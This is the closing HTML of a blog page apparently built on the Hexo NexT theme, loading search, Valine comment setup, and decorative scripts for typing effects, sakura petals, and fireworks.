<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  


  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'vcFyBSklL05djh0SlQ0i9Idk-gzGzoHsz',
      appKey     : 'wFXz2jiwl2Jo3Q5LWDFdhUsv',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>


<script src="/js/cursor.js"></script>

<script type="text/javascript">
//只在桌面版网页启用特效
var windowWidth = $(window).width();
if (windowWidth > 768) {
    document.write('<script type="text/javascript" src="/js/sakura.js"><\/script>');
}
</script>


<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/animejs/2.2.0/anime.min.js"></script> 
<script type="text/javascript" src="/js/fireworks.js"></script>
